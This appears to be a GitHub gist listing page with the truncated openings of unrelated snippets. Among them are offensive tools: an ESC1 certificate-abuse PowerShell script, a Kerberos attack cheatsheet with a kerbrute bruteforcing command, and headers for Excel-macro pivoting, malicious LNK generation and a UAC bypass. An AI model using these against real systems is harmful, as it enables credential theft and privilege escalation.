Skip to content

Instantly share code, notes, and snippets.

@b4cktr4ck2
b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@BOLL7708
BOLL7708 / twitch-bonus-auto-claimer.js
Last active July 26, 2023 17:35
BOLL's UserScripts
// ==UserScript==
// @name Twitch Bonus Auto Claimer
// @namespace https://github.com/BOLL7708
// @homepageURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33
// @downloadURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33/raw/twitch-bonus-auto-claimer.js
// @match *://twitch.tv/*
// @match *://www.twitch.tv/*
// @grant GM_getValue
// @grant GM_setValue
// @version 1.0
@solariz
solariz / rescreen.c
Created February 3, 2021 07:56
tiny tool to move all Windows to the main Screen
/* tiny tool to move all Windows to the main Screen
* https://tcpip.wtf/en/rescreen-tool-to-move-all-windows-to-your-win-main-screen.htm
*/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace rescreen
{
class Program
@0xdevalias
0xdevalias / unofficial-viome-api-endpoints-data-export-backup.md
Last active March 27, 2023 03:38
(unofficial) Guide to Viome API Endpoints, Data Export and Backup

(unofficial) Guide to Viome API Endpoints, Data Export and Backup

Since Viome doesn't appear to offer us a way to export our data aside from as a PDF, I was inspired to have a look if I could see it any other way.


The CEO says that they don't release the raw data:

@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

nmap --top-ports <#ports> -v -oG - localhost

Top 100:

7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157

Top 1000:

##Custom TMUX settings
# 0 is too far from ` ;)
set -g base-index 1
#Set colors to work
set -g default-terminal "screen-256color"
#Remap Prefix to screens
set -g prefix C-a
bind C-a send-prefix
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None